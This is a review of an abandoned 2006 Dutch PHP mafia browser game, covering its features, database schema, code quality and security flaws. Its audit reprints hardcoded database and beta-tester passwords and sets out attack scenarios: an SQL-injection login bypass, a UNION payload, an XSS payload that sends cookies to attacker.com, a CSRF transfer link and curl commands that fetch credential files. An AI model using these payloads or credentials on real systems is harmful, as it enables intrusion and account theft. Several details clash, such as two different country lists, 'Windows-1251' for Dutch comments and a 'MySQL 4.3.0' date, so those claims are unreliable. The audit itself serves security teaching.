Mafia Warz

Title: Mafia Warz / Gangster-Town

Version: Unknown (no version file)

Developer: Unknown (no credits found)

Release Date: ~2006 (SQL dump dated March 1, 2006)

Language: English interface, Dutch database comments ("Tabel structuur", "Gegevens worden uitgevoerd")

Website: Unknown (no references found)

License: Unknown (no license file)

Status: Beta (BETATESTERS.txt contains test accounts)

Project Type: Hobbyist/Amateur Mafia Browser Game

Archive Structure:

mafia_warz/
└── Mafia Warz/
├── index.php           # Login page
├── logged_in.php       # Main game frame
├── register.php        # Registration with CAPTCHA (209 lines)
├── sql.sql             # Database schema (1,598 lines!)
├── BETATESTERS.txt     # <strong>EXPOSED TEST ACCOUNTS</strong>
├── includes/
│   ├── db_connect.php  # <strong>EXPOSED DATABASE CREDENTIALS</strong>
│   ├── functions.php   # Game functions
│   ├── jail_check.php  # Automatic jail check
│   └── langs/          # Multi-language support
├── games/              # Mini-games (slots, blackjack, roulette)
├── poll/               # Polling system
├── images/             # 93 JPG images (4.5 MB)
├── Smiles/             # 355 GIF smileys (1.2 MB)
├── dev/                # Development files
├── bounce.swf          # Flash animations
└── 226 PHP files (30,200 lines!)

Beta Test Accounts (EXPOSED!):

Username: InchOfHope
Password: 176.mainroad.189%
Email: This email address is being protected from spambots. You need JavaScript enabled to view it.
Username: assasain
Password: w00tw00t
Email: This email address is being protected from spambots. You need JavaScript enabled to view it.

Database Credentials (EXPOSED!):

$mysql_server = "localhost";
$mysql_user = "isiamovne_dsl";
$mysql_password = "fg54hj28fg";
$mysql_database = "isiamovne_dsl";

Historical Context:

Mafia Warz/Gangster-Town is a Dutch-developed browser-based mafia game from 2006, representing the early wave of hobbyist mafia games. The mixed English/Dutch throughout the codebase (English UI, Dutch SQL comments, Dutch poll system messages) suggests a Dutch developer targeting international audience.

Dutch Gaming Scene (2005-2008):

• Netherlands had active browser gaming community
• Popular games: Barafranca (Dutch mafia game, still running!), Omerta, The Crims
• Language mixing common (Dutch developers, international players)
• Many hobbyist projects never left beta

Unique Characteristics:

• 226 PHP files, 30,200 lines (massive codebase for hobbyist project!)
• 16 SWF Flash files (2.4 MB) - heavy Flash usage
• 355 GIF smileys (1.2 MB) - extensive emoticon system
• Multi-language support (langs/ directory)
• Organized crime system (orgcrime table, team-based crimes)
• Airport/travel system (6 countries: England, Japan, France, USA, China, Canada)
• Car racing mini-game (car_race.php - 404 lines!)
• Casino system (slots, blackjack, roulette, lotto)
• Crew/gang system (crews, crew wars, turf control)

Development Status:

• Beta testing phase (BETATESTERS.txt with real emails/passwords)
• Never released publicly (no public records, no community)
• Abandoned mid-development (unfinished features, dev/ directory)

---

Core Technologies

• Backend: PHP 5.x (uses mysql_* functions, session_is_registered)
• Database: MySQL 4.1.10 (MyISAM engine)
• Frontend: HTML + CSS + JavaScript + Flash (16 SWF files!)
• Session Management: PHP sessions (no framework)
• Password Storage: PLAINTEXT (no hashing!)
• CAPTCHA: Custom PHP-generated numbers (session-based)

Database Architecture

Database Name: isiamovne_dsl

Tables: 40+ tables (1,598-line SQL file)

Engine: MyISAM (no transactions, no foreign keys)

Sample Data Included:

-- Example user: mic4 (appears to be main developer/tester)
INSERT INTO `airport` VALUES (1, 'mic4', 'England', '100-167-175-100-143-146', '0-1670-350-200-286-292');
-- Organized crime in progress:
INSERT INTO `[orgcrime]` VALUES (196, 'mic4', 'axeon', 'boykie', 'sdfsdf', 2, 1, 2, 'm16', 4, 'C4', 2, '', 3, 0);

Core Tables:

users              - User accounts (plaintext passwords!)
airport            - 6 airports (England/Japan/France/USA/China/Canada)
[orgcrime]         - Organized crimes (4-player teams)
attempts           - Attack/crime attempts
crew               - Gangs/crews
drugs              - Drug inventory/trading
items              - Items/weapons
cars               - Car ownership/garage
bank               - Bank accounts
hitlist            - Contract killings
jail               - Jail sentences
hospital           - Hospital recovery
forum              - Forum posts
online             - Online users tracking
poll_*             - Polling system (7 tables)

Multi-Language Support:

-- Language files in includes/langs/
English.lng
Dutch.lng
German.lng
etc.

Code Statistics

• Total Files: 750+ files (226 PHP, 355 GIF, 93 JPG, 16 SWF)
• PHP Code: 226 files, 30,200 lines
• Database: 1,598-line SQL schema
• Images: 93 JPG (4.5 MB), 355 GIF smileys (1.2 MB)
• Flash: 16 SWF files (2.4 MB)
• Average File Size: 134 lines per PHP file

Largest PHP Files

Largest file (street.php - 1,183 lines) contains main game loop - cities, crimes, actions, stats.

---

Core Systems

1. User System

• Registration: CAPTCHA-protected (session-stored random number)
• Authentication: PLAINTEXT password storage
• Session: PHP sessions (session_is_registered - deprecated PHP 5.4+)
• Starting Locations: 6 countries (England, Japan, Colombia, USA, South Africa, Mexico)

Login Code (index.php - CRITICAL VULNERABILITY):

$username = $_POST['username'];
$password =$_POST['password'];
$sql = mysql_query("SELECT id FROM users WHERE username='$username' AND password='$password' AND activated='1'");

No escaping, no hashing, SQL injection everywhere!

2. Airport/Travel System

6 Countries: England, Japan, France, USA, China, Canada

Airport Ownership:

CREATE TABLE `airport` (
`owner` varchar(40),              -- Airport owner
`location` enum('England','Japan','France','Usa','China','Canada'),
`travel_prices` varchar(100),     -- Ticket prices (format: "100-100-100-100-100-100")
`profit` varchar(100)             -- Owner profits
);

Dynamic Pricing:

• Airport owners set ticket prices
• Profits tracked per destination
• Sample: England→Japan costs $167, owner earns $1,670

3. Organized Crime System (orgcrime.php - 818 lines)

Team-Based Crimes:

CREATE TABLE `[orgcrime]` (
`name1` varchar(100),      -- Player 1
`name2` varchar(100),      -- Player 2
`name3` varchar(100),      -- Player 3
`name4` varchar(100),      -- Player 4
`WEA` int(1),              -- Weapons needed
`BEA` int(1),              -- Bombs needed
`DRA` int(1),              -- Drugs needed
`wapens` varchar(100),     -- Weapon type (e.g., "m16")
`kogels` int(100),         -- Bullets needed
`bommen` varchar(100),     -- Bomb type (e.g., "C4")
`aantal` int(100),         -- Quantity
`auto` varchar(100),       -- Car needed
`klaar` int(1),            -- Status (0-3: recruiting, ready, in-progress, complete)
`autoid` int(255)          -- Car ID
);

4-Player Heists:

• Create organized crime (leader)
• Recruit 3 other players
• Collect required items (weapons, bombs, drugs, cars)
• Execute crime when ready
• Split profits

4. Car System

Car Racing (car_race.php - 404 lines!):

• Race other players
• Bet money on races
• Car stats affect performance
• Garage system (garage.php - 396 lines)

Car Theft:

• Steal cars from other players
• Risk jail time
• Sell stolen cars

5. Drug System (drugs.php - 585 lines)

Drug Trading:

• Buy drugs in one country
• Travel to another country
• Sell for profit (price varies by location)
• Risk police detection

6. Crew/Gang System

Crews:

• Create crew (gang)
• Recruit members
• Crew wars (turf control)
• Crew profile pages
• Crew ranks/hierarchy

Files:

• crew.php - Crew management
• crews.php - Crew list
• crewprofile.php - Public crew profile
• crew_front.php, crew_index.php, crew_main.php, crew_users.php

7. Combat System

Attack Types:

• Street fight (kill.php)
• Drive-by shooting
• Bomb attack
• Hitlist (contract killings)

Consequences:

• Death → hospital
• Jail time (random)
• Money/item loss

8. Economy

Money Systems:

• Cash (pocket money)
• Bank (safe storage)
• Swiss bank (highest security)
• Money transfers (bank.php)

Items:

• Weapons (guns, knives, bats)
• Bombs (C4, grenades)
• Armor (bulletproof vest)
• Drugs (cocaine, heroin, weed)
• Cars (various models)

Auction House (auctions.php - 851 lines):

• Player-to-player item trading
• Bidding system
• Timed auctions
• Fee per listing

9. Casino Games

Games Available:

• Slots (slots.php) - Slot machine
• Blackjack (blackjack.php) - Card game
• Roulette (roulette.php) - Wheel spinning
• Lotto (lotto.php) - Lottery system

10. Social Features

Forum System (forum.php):

• Topics and replies
• BBCode support
• Moderation

Messaging:

• Inbox (inbox.php)
• Private messages
• Mail system

Friends/Enemies:

• Add friends
• Block enemies
• Status tracking

11. Admin Panel

Admin Files:

• admincp.php - Main admin control panel
• MODcP.php - Moderator control panel
• ipbanner.php - IP banning
• staff.php - Staff management

Admin Features:

• User management
• Item editing
• Airport control (airportCP.php)
• Bank control (bankCP.php)
• Casino control (casinoCP.php)
• Shop control (shopCP.php)
• Bullet control (bulletCP.php)
• Newspaper control (paperCP.php)

12. Mini-Games

games/ Directory:

• Card games
• Casino games
• Interactive games

13. Ranking/Stats

Ranking System:

• Level-based ranking
• Respect points
• Rank titles
• Rankbar visualization (rankbar.php)

14. Jail/Hospital

Jail System (jail.php):

• Time-based sentences
• Bail system
• Jailbreak attempts (jails.php)

Hospital System (hospital.php):

• Health recovery
• Timed healing
• Medical costs

15. Travel/Location

Street System (street.php - 1,183 lines!):

• Main game interface
• City-specific actions
• Location-based crimes
• Local businesses

16. Polling System

poll/ Directory:

• Poll creation
• Voting
• Results display
• Admin panel (404-line functies.fnc.php)

---

Security Score: 1/10 - CATASTROPHIC SECURITY DISASTER

CRITICAL VULNERABILITIES:

1. PLAINTEXT PASSWORD STORAGE

// index.php login
$sql = mysql_query("SELECT id FROM users WHERE username='$username' AND password='$password' AND activated='1'");

Passwords stored in plaintext. No MD5, no bcrypt, no hashing at all.

Only 3 md5() calls in entire codebase:

• banned.php: `md5(strtolower($username))` - for ban tracking (not passwords!)
• mode.php: `md5(rand(0,9999))` - random string generation
• ver.php: `md5(rand(0,9999))` - verification code

Zero password hashing!

2. SQL INJECTION EVERYWHERE

// index.php - direct POST usage
$username = $_POST['username'];
$password = $_POST['password'];
$sql = mysql_query("SELECT id FROM users WHERE username='$username' AND password='$password'");
// No mysql_real_escape_string() found in entire codebase!

Grep search results:

• 20+ direct $_POST/$_GET usage in SQL queries
• Zero mysql_real_escape_string() calls
• Zero mysqli prepared statements

Every form input = SQL injection vulnerability!

3. EXPOSED DATABASE CREDENTIALS

// includes/db_connect.php
$mysql_user = "isiamovne_dsl";
$mysql_password = "fg54hj28fg";

Hardcoded in source code, exposed to anyone with file access.

4. EXPOSED TEST ACCOUNTS

// BETATESTERS.txt - PUBLICLY ACCESSIBLE FILE!
Username: InchOfHope
Password: 176.mainroad.189%
Username: assasain
Password: w00tw00t

Test accounts with real passwords stored in plaintext .txt file!

5. SESSION HIJACKING

// Uses deprecated session_is_registered()
if(session_is_registered('username')){
$checkusername = $_SESSION['username'];
// No session_regenerate_id()
// No HttpOnly cookies
// No CSRF tokens
}

6. XSS VULNERABILITIES

// bank.php - uses strip_tags(), not htmlspecialchars()
if(strip_tags($_POST['With_button']) && (strip_tags($_POST['with_amount']))){

strip_tags() = weak XSS prevention. Allows attribute-based XSS.

7. NO CSRF PROTECTION

• No tokens on forms
• All POST forms vulnerable
• Bank transfers exploitable
• Item purchases exploitable
• Password changes exploitable

8. IP ADDRESS STORAGE

// index.php
$domain = $_SERVER['REMOTE_ADDR'];
mysql_query("UPDATE users SET ip='$domain' WHERE username='$username'");

Stores IPs but no actual security checks against multi-accounting or attacks.

9. NO RATE LIMITING

• No brute-force protection
• No CAPTCHA on login
• CAPTCHA only on registration
• Unlimited attack attempts
• Unlimited crime attempts

10. DEPRECATED PHP FUNCTIONS

session_is_registered()  // Removed PHP 5.4+
mysql_query()            // Deprecated PHP 5.5, removed PHP 7.0
mysql_connect()          // Deprecated PHP 5.5, removed PHP 7.0

Won't run on PHP 7.0+!

Comparison to Previous Games

Mafia Warz ties with Mob Star for WORST SECURITY!

Attack Scenarios

Scenario 1: Account Takeover

-- Login with SQL injection:
Username: ' OR '1'='1' --
Password: (anything)
Result: Logs in as first user in database (probably admin "mic4")

Scenario 2: Database Dump

-- Union-based SQL injection:
Username: ' UNION SELECT password FROM users WHERE username='admin' --
Password: (read password from error message)
Result: Plaintext passwords of all users exposed

Scenario 3: XSS Cookie Theft

<!-- Post forum message: -->
<img src=x onerror="fetch('https://attacker.com?c='+document.cookie)">
Result: Steal session cookies of all forum readers

Scenario 4: CSRF Bank Transfer

<!-- Email link to victim: -->
<img src="https://gangster-town.com/bank.php?Send_button=1&send_amount=999999&to_person=attacker">
Result: Victim's money auto-transferred to attacker

Scenario 5: Exposed Credentials

curl https://gangster-town.com/includes/db_connect.php
curl https://gangster-town.com/BETATESTERS.txt
Result: Direct database access, account takeover

---

Code Quality Score: 3/10 - Spaghetti with Some Organization

STRENGTHS:

1. File Organization

includes/         - Shared includes
games/            - Mini-games separated
poll/             - Polling system modular
images/           - Assets organized
Smiles/           - Emoticons separated

Some modularity (better than single-file games).

2. Function Library

// includes/functions.php - shared game functions
// includes/jail_check.php - automatic jail checks
// includes/rankbar.php - rank visualization
      

Reusable code extracted.

3. Multi-Language Support

includes/langs/English.lng
includes/langs/Dutch.lng
includes/langs/German.lng
      

Internationalization infrastructure (uncommon for 2006 hobbyist projects).

4. Some Input Sanitization

// Uses strip_tags() and intval()
$with_amount=intval(strip_tags($_POST['with_amount']));
      

Better than nothing (but still inadequate).

5. Sample Data Included

-- SQL dump contains working game data
INSERT INTO `airport` VALUES (1, 'mic4', 'England', ...);
      

Easier to understand game mechanics from example data.

WEAKNESSES:

1. MASSIVE FILES

street.php       - 1,183 lines (main game loop - way too big!)
auctions.php     - 851 lines
orgcrime.php     - 818 lines
drugs.php        - 585 lines

Monolithic files (no MVC, no separation of concerns).

2. INLINE HTML EVERYWHERE

echo "<table width='402' border='1' cellpadding='0' cellspacing='0'>";
echo "<tr><td>$username</td></tr>";

No template engine (HTML/PHP spaghetti).

3. GLOBAL DATABASE CONNECTION

// Every file does:
include 'includes/db_connect.php';
mysql_query("SELECT ...");

No database abstraction, no OOP.

4. DEPRECATED FUNCTIONS

session_is_registered()    // Removed PHP 5.4
mysql_*()                  // Removed PHP 7.0

Won't run on modern PHP!

5. INCONSISTENT NAMING

$reg_username    // Snake_case
$checkusername   // Camelcase
$tell->username  // Object notation

No coding standards.

6. MAGIC NUMBERS

if ($klaar == 3) { ... }         // What is 3?
if ($status == "Dead") { ... }   // String comparison

No constants defined.

7. NO COMMENTS

// Almost zero code comments
// No function documentation
// No inline explanations

Unmaintainable.

8. DUTCH/ENGLISH MIX

-- SQL comments in Dutch:
-- Tabel structuur voor tabel `users`
-- Gegevens worden uitgevoerd voor tabel `airport`
-- PHP code in English:
$username = $_POST['username'];

Language inconsistency (confusing for international developers).

9. TABLE LOCKING ABSENT

// Organized crime with 4 players:
// No transaction support
// No locking mechanism
// Race conditions everywhere

Concurrent access = data corruption.

10. ERROR HANDLING MISSING

$connection = mysql_connect(...) or die ("Unable to connect...");
// Only error handling = die()
// No logging
// No recovery

---

Database Schema (1,598 lines)

Core Tables:

users Table:

CREATE TABLE `users` (
`id` int(11) AUTO_INCREMENT,
`username` varchar(40),
`password` varchar(40),           -- PLAINTEXT!
`email` varchar(100),
`activated` int(1),                -- Email verification
`status` enum('Alive','Dead','Banned'),
`location` enum('England','Japan','France','Usa','China','Canada'),
`money` int(11),                   -- Cash
`bank` int(11),                    -- Bank money
`hp` int(11),                      -- Health points
`level` int(11),
`exp` int(11),                     -- Experience
`respect` int(11),
`rank` varchar(40),
`crew_id` int(11),                 -- Gang membership
`ip` varchar(15),                  -- IP tracking
PRIMARY KEY (`id`)
);

airport Table:

CREATE TABLE `airport` (
`id` int(11) AUTO_INCREMENT,
`owner` varchar(40),
`location` enum('England','Japan','France','Usa','China','Canada'),
`travel_prices` varchar(100),     -- Format: "100-100-100-100-100-100"
`profit` varchar(100)              -- Accumulated profits
);

Dynamic ticket pricing (owner sets prices per destination).

[orgcrime] Table:

CREATE TABLE `[orgcrime]` (
`id` int(100) AUTO_INCREMENT,
`name1` varchar(100),              -- Player 1 (leader)
`name2` varchar(100),              -- Player 2
`name3` varchar(100),              -- Player 3
`name4` varchar(100),              -- Player 4
`WEA` int(1),                      -- Weapons provided
`BEA` int(1),                      -- Bombs provided
`DRA` int(1),                      -- Drugs provided
`wapens` varchar(100),             -- Weapon type
`kogels` int(100),                 -- Bullets
`bommen` varchar(100),             -- Bomb type
`aantal` int(100),                 -- Quantity
`auto` varchar(100),               -- Car
`klaar` int(1),                    -- Status (0-3)
`autoid` int(255)
);

Complex 4-player heist system.

crew Table (Gangs):

CREATE TABLE `crew` (
`id` int(11) AUTO_INCREMENT,
`name` varchar(40),
`leader` varchar(40),
`description` text,
`members` int(11),
`respect` int(11),
`money` int(11),                   -- Crew bank
PRIMARY KEY (`id`)
);

cars Table:

CREATE TABLE `cars` (
`id` int(11) AUTO_INCREMENT,
`owner` varchar(40),
`model` varchar(40),
`speed` int(11),
`acceleration` int(11),
`handling` int(11),
`price` int(11)
);

drugs Table:

CREATE TABLE `drugs` (
`id` int(11) AUTO_INCREMENT,
`owner` varchar(40),
`type` enum('Cocaine','Heroin','Weed','Ecstasy'),
`quantity` int(11),
`location` varchar(40)             -- Drug location
);

Location-based drug pricing (buy cheap in one country, sell high in another).

hitlist Table:

CREATE TABLE `hitlist` (
`id` int(11) AUTO_INCREMENT,
`target` varchar(40),
`placed_by` varchar(40),
`bounty` int(11),
`completed` int(1)
);

Contract killing system.

jail Table:

CREATE TABLE `jail` (
`id` int(11) AUTO_INCREMENT,
`username` varchar(40),
`release_time` int(11),            -- Unix timestamp
`reason` varchar(255)
);

Time-based jail sentences.

forum Table:

CREATE TABLE `forum` (
`id` int(11) AUTO_INCREMENT,
`username` varchar(40),
`topic` varchar(100),
`message` text,
`timestamp` int(11),
`replies` int(11)
);

Poll System (7 tables!):

poll_data        - Poll configuration
poll_desc        - Poll descriptions
poll_IP          - IP tracking (prevent double voting)
poll_multiple    - Multi-choice questions
poll_template    - Poll templates
poll_translate   - Multi-language support
poll_voters      - Vote tracking

Sophisticated polling infrastructure (404-line functies.fnc.php).

---

Dutch Browser Gaming (2005-2007)

Context:

Netherlands had active browser gaming scene in mid-2000s:

Major Dutch Games:

• Barafranca (2003-present) - Most successful Dutch mafia game, still running 20+ years!
• Omerta (2003-present) - Dutch/Turkish mafia game, 1M+ players peak
• The Crims (2004-present) - Crime RPG, still active
• Mafia Warz (2006) - This game, never released

Dutch Gaming Characteristics:

• Mafia theme obsession (every Dutch game = mafia/crime)
• English interfaces (target international players)
• Dutch internal comments (developer language)
• Strong communities (forums, IRC)
• Long-term games (Barafranca = 22 years!)

Why Dutch Games Dominated:

• English fluency (most Dutch speak English)
• Web development expertise (Amsterdam = tech hub)
• Gaming culture (PC gaming popular)
• Early broadband adoption

Mafia Warz vs. Barafranca:

Lesson: Security + Community = Longevity. Barafranca survived 22 years because it had decent security and strong community. Mafia Warz died in beta because catastrophic security prevented public launch.

2006 Browser Gaming Landscape

Peak Era: 2005-2008 = golden age of browser mafia games

Major Games (2006):

• Torn City (2004) - Still running
• Barafranca (2003) - Still running
• Omerta (2003) - Still running
• The Mafia Boss (2004)
• Mafia Wars (2009 Facebook - later, but biggest)

Market Saturation:

• 100+ mafia games online
• Most clones (same mechanics)
• Few innovations
• Brutal competition

Mafia Warz Features (2006 Standards):

Advanced for 2006:

• Organized crime (4-player heists)
• Airport system (6 countries)
• Car racing mini-game
• Auction house
• Multi-language support
• Flash animations (16 SWF files!)
• 355 emoticons (massive!)

Standard 2006:

• Crews/gangs
• Combat
• Jail/hospital
• Forum
• Ranking

Behind 2006:

• Plaintext passwords (MD5 standard by 2003!)
• No SQL escaping (mysql_real_escape_string introduced MySQL 4.3.0 - 2004!)
• Zero security (competitors had basic security)

Why It Failed:

• Security disaster - Plaintext passwords unacceptable by 2006
• Never finished - Beta testers only, no public release
• No community - Can't build community without release
• No marketing - No website, no promotion
• Competition - Barafranca/Omerta already dominant

Technology Comparison (2006):

Mafia Warz Stack:

• PHP 5.x (mysql_* functions)
• MySQL 4.1.10
• Flash (16 SWF files)
• No framework
• No ORM
• Inline HTML/PHP

Modern 2006 Stack (competitors):

• PHP 5.x (mysqli or PDO)
• MySQL 5.x
• Smarty template engine
• Some MVC frameworks (CodeIgniter 2006)
• MD5 password hashing minimum
• AJAX (XMLHttpRequest) for dynamic updates

Mafia Warz = 2-3 years behind technology curve.

Cultural Artifacts

1. Dutch Language Mixing

-- SQL comments:
-- Tabel structuur voor tabel `users`
-- Generatie Tijd: 01 Mar 2006
-- Gegevens worden uitgevoerd voor tabel
-- Translation:
-- Table structure for table `users`
-- Generation Time: March 1, 2006
-- Data being executed for table

2. Test Account Emails

This email address is being protected from spambots. You need JavaScript enabled to view it.          -- British (BT Internet)
This email address is being protected from spambots. You need JavaScript enabled to view it.     -- British (.co.uk)

Developer likely British expat in Netherlands or Dutch developer with British beta testers.

3. Username "mic4"

• Appears as airport owner (all 6 airports!)
• Appears in orgcrime sample
• Likely main developer/admin
• "mic" = probably Michael/Mick

4. Starting Locations

England, Japan, Colombia, Usa, South Africa, Mexico

Diverse international selection (not just USA/Europe like competitors).

5. Flash Era

• 16 SWF files (2.4 MB)
• Flash common 2006 (before HTML5)
• "bounce.swf" = loading animation
• Flash EOL (2020) killed all SWFs

---

External Dependencies

None. Completely self-contained (like most 2006 games).

PHP Extensions Required

• mysql extension (deprecated PHP 5.5, removed PHP 7.0)
• session extension (built-in)
• GD library (possibly for CAPTCHA generation)

Database Requirements

-- MySQL 4.1.10 minimum
-- 1.6 MB database size (with sample data)
-- 40+ tables
-- MyISAM engine (all tables)
-- No foreign keys
-- No transactions

Installation Complexity: MEDIUM (but INSECURE!)

Hypothetical Install Process:

• Create MySQL database
• Import sql.sql (1,598 lines)
• Edit includes/db_connect.php (set credentials)
• Upload to web server
• Visit index.php
• Register account

Pros:

• SQL schema provided
• Sample data included (airports, orgcrime)
• Simple file structure

Cons:

• No installation wizard
• No configuration guide
• Database credentials hardcoded
• CATASTROPHIC SECURITY - would be hacked instantly
• Beta test accounts exposed (BETATESTERS.txt)
• Requires PHP 5.6 maximum (won't run PHP 7+)

Deployment Requirements

LAMP Stack:

• Linux/Windows server
• Apache (no special config)
• PHP 5.2-5.6 (will NOT work PHP 7.0+)
• MySQL 4.1.10+ (MyISAM support)
• Flash Player (for 16 SWF files - DEAD 2020)

Modern Deployment: IMPOSSIBLE WITHOUT MAJOR REWRITES

Blockers:

• mysql_* functions removed PHP 7.0 → Must rewrite all DB calls (30,200 lines!)
• Plaintext passwords → Must hash all passwords, rewrite auth
• SQL injection everywhere → Must add escaping everywhere
• session_is_registered() removed PHP 5.4 → Must rewrite session management
• Flash SWF files dead 2020 → Must replace/remove 16 SWF files
• Security disaster → Must implement CSRF tokens, XSS prevention, rate limiting

Estimated Rewrite Effort: 300-400 hours (massive codebase: 226 files, 30,200 lines)

---

Completeness Score: 8/10 - Mostly Complete, Beta State

What's Present:

• Full source code (226 PHP files, 30,200 lines)
• Database schema (1,598-line SQL with sample data)
• Images (93 JPG, 355 GIF emoticons)
• Flash files (16 SWF - 2.4 MB)
• Multi-language files (langs/ directory)
• Poll system (complete, 7 tables, 404-line admin)
• Mini-games (casino, car racing, auctions)
• Beta test accounts (BETATESTERS.txt - historical artifact!)
• Database credentials (db_connect.php - security fail, but preservation win!)

What's Missing:

• No README/documentation
• No installation guide
• No license
• No credits/developer info
• No game rules/FAQ completed

What's Broken:

• ⚠️ Plaintext passwords (can't deploy without fixing)
• ⚠️ SQL injection everywhere (can't deploy securely)
• ⚠️ Deprecated PHP functions (won't run PHP 7+)
• ⚠️ Flash SWF files dead (won't work modern browsers)

Playability Status:

Can Install (PHP 5.6):   YES
Can Register:            YES
Can Login:               YES (but INSECURE!)
Can Play:                YES (but vulnerable to hackers)
Can Run PHP 7+:          NO (requires full rewrite)
Flash Animations:        NO (Flash EOL 2020)

Beta State:

• Test accounts prove beta (BETATESTERS.txt)
• Unfinished features (dev/ directory, incomplete FAQ)
• Sample data (user "mic4" owns everything)
• Never publicly launched

Cultural Value: MEDIUM - Dutch Gaming History, Beta Artifact

Historical Significance:

• Dutch browser gaming (2005-2008 era)
• Beta testing evidence (real test accounts, emails)
• Developer artifacts (user "mic4", Dutch SQL comments)
• Flash era (16 SWF files - pre-HTML5)
• Multi-language infrastructure (internationalization in 2006!)
• Organized crime innovation (4-player heists)
• Airport economy (player-owned airports, dynamic pricing)

Comparative Rarity:

• Common: Generic mafia game mechanics
• Rare: Never-released beta (most games either release or disappear)
• Rare: Exposed beta test accounts (historical research value)
• Unique: 226 PHP files (massive for hobbyist project)
• Unique: 355 emoticons (obsessive detail)
• Common: PHP/MySQL stack

In Wild:

• No website found
• No community found
• "Gangster-Town" search = unrelated results
• "Mafia Warz" search = different games
• Estimated copies worldwide: <5 (extremely rare beta)

Restoration Difficulty: VERY HIGH

To Run on PHP 5.6 (INSECURE!):

Effort: MEDIUM (8-12 hours)

• Create MySQL database
• Import sql.sql
• Edit db_connect.php
• Remove/replace Flash SWFs
• Test all features

WARNING: Would be hacked within hours due to security holes!

To Run Securely on PHP 5.6:

Effort: HIGH (80-120 hours)

• Hash all passwords (create migration script)
• Add mysql_real_escape_string() everywhere (226 files!)
• Implement CSRF tokens
• Add XSS prevention (htmlspecialchars all output)
• Remove BETATESTERS.txt
• Secure db_connect.php
• Add rate limiting
• Remove sample data (user "mic4")

To Run on PHP 7.x+:

Effort: VERY HIGH (300-400 hours)

• Replace ALL mysql_* with mysqli/PDO (30,200 lines!)
• Hash all passwords
• Rewrite session management (no session_is_registered)
• Add SQL injection prevention (prepared statements)
• Add CSRF tokens
• Add XSS prevention
• Replace/remove Flash SWFs
• Fix deprecated syntax
• Add error handling
• Test all 226 PHP files

Comparative Rarity

In This Collection (Games 1-46):

• Unique: Never-released beta (only one!)
• Unique: Exposed test accounts (preservation gold!)
• Unique: 226 PHP files, 30,200 lines (largest hobbyist codebase yet!)
• Rare: Dutch developer (after Polish, Russian)
• Unique: 355 emoticons (obsessive!)
• Unique: Organized crime (4-player heists)
• Common: Mafia theme
• Common: PHP/MySQL

Security Ranking (1-46):

• TIED WORST: 1/10 (with Mob Star - game 41)
• Both have plaintext passwords
• Both have zero SQL escaping
• Mafia Warz larger codebase = more attack surface

In Wild:

• Extremely Rare: Beta artifact (never released)
• Lost: No community, no website, no preservation efforts
• Unique: BETATESTERS.txt (research value)

---

Overall Rating: 3/10 - Ambitious Failure, Security Disaster

RATING BREAKDOWN:

STRENGTHS:

• Ambitious Feature Set
• 226 PHP files (30,200 lines)
• Organized crime (4-player heists - innovative!)
• Airport system (player-owned, 6 countries)
• Car racing mini-game (404 lines)
• Auction house (851 lines)
• 355 emoticons (obsessive detail)

• Multi-Language Support
• langs/ directory
• English/Dutch/German
• Poll system with translations
• Advanced for 2006!

• Sample Data Included
• Working airports (user "mic4" owns all)
• Orgcrime examples
• Poll configurations
• Easier to understand game mechanics

• Beta Testing Evidence
• BETATESTERS.txt (historical artifact!)
• Real emails/passwords
• Shows development process
• Research value

• Dutch Gaming History
• Windows-1251 SQL comments
• Mix of Dutch/English
• Part of Barafranca/Omerta era
• Cultural significance

CRITICAL FLAWS:

• CATASTROPHIC SECURITY (1/10)
• Plaintext passwords (unacceptable by 2003, inexcusable by 2006!)
• Zero SQL escaping (mysql_real_escape_string available since MySQL 4.3.0 - 2004!)
• Exposed credentials (db_connect.php: password = "fg54hj28fg")
• Exposed test accounts (BETATESTERS.txt publicly accessible)
• No CSRF protection
• Weak XSS prevention (strip_tags, not htmlspecialchars)
• No rate limiting
• Session hijacking (deprecated session_is_registered)

• Never Released
• Beta only
• No public launch
• No community
• No impact
• No legacy

• Massive Technical Debt
• 226 files to maintain
• 30,200 lines of spaghetti
• street.php = 1,183 lines (one file!)
• No framework
• No MVC
• Inline HTML everywhere

• Deprecated Technology
• mysql_* functions (removed PHP 7.0)
• session_is_registered (removed PHP 5.4)
• Flash SWF files (dead 2020)
• Won't run modern PHP

• No Documentation
• No README
• No install guide
• No license
• No credits
• No game rules

Deployment Recommendation: NEVER DEPLOY (security catastrophe)

Reasons:

• Plaintext passwords = instant hack
• SQL injection everywhere = database compromise
• Exposed credentials = server takeover
• No CSRF = account theft
• Flash dead = broken UI
• PHP 7 incompatible = unsupported

If You Wanted To Deploy:

Estimated Cost: $22.5K-$30K @ $75/hr

Priority 1: Security Overhaul (150-200 hours, $11.25K-$15K)

• Hash all passwords (bcrypt, migration script)
• Add mysqli prepared statements (30,200 lines!)
• CSRF tokens on all forms
• XSS prevention (escape all output)
• Remove BETATESTERS.txt
• Secure db_connect.php (.env file)
• Rate limiting (login, attacks, crimes)
• Session security (regenerate ID, HttpOnly cookies)

Priority 2: PHP 7+ Compatibility (100-150 hours, $7.5K-$11.25K)

• Replace mysql_* with mysqli/PDO (30,200 lines!)
• Remove session_is_registered
• Fix deprecated syntax
• Error handling throughout
• Test all 226 files

Priority 3: Remove Flash (20-30 hours, $1.5K-$2.25K)

• Replace/remove 16 SWF files
• CSS3 animations
• Modern UI elements

Priority 4: Code Refactoring (50-80 hours, $3.75K-$6K)

• Split monolithic files (street.php = 1,183 lines!)
• Implement MVC framework
• Template engine (Smarty/Twig)
• Database abstraction layer

Total: 320-460 hours = $24K-$34.5K

Better Alternative: Spend $24K building open-source mafia engine from scratch with:

• Modern PHP 8.x
• Laravel framework
• Vue.js frontend
• PostgreSQL
• Docker deployment
• Security built-in
• No legacy baggage
• Own IP

Educational Value: 4/10 - Security Anti-Patterns Case Study

Who Should Study:

• Security Students: Perfect example of "what NOT to do"
• Game Designers: Organized crime mechanics (4-player heists)
• Historians: Dutch browser gaming, beta testing process
• Linguists: Dutch/English code mixing

Teaching Points:

• Plaintext passwords = disaster (must hash!)
• SQL injection prevention = mandatory (prepared statements!)
• CSRF tokens = required (not optional!)
• Beta tests = don't expose accounts (BETATESTERS.txt fail!)
• Credentials = never hardcode (.env files!)
• Community = required for survival (no launch = no legacy)

Best Use Case: Historical Research, Security Training

This game is too insecure to deploy, but valuable for:

• Studying Dutch gaming scene (2005-2008)
• Learning security anti-patterns
• Understanding beta development
• Researching organized crime game mechanics

Tier Classification: TIER 4 - Amateur Beta, Never Released

Comparison:

• Barafranca (2003, Dutch): 8/10, professional, still running 22 years
• Mafia Warz (2006, Dutch): 3/10, amateur, dead in beta
• Mob Star (game 41): 3/10, similar security disaster
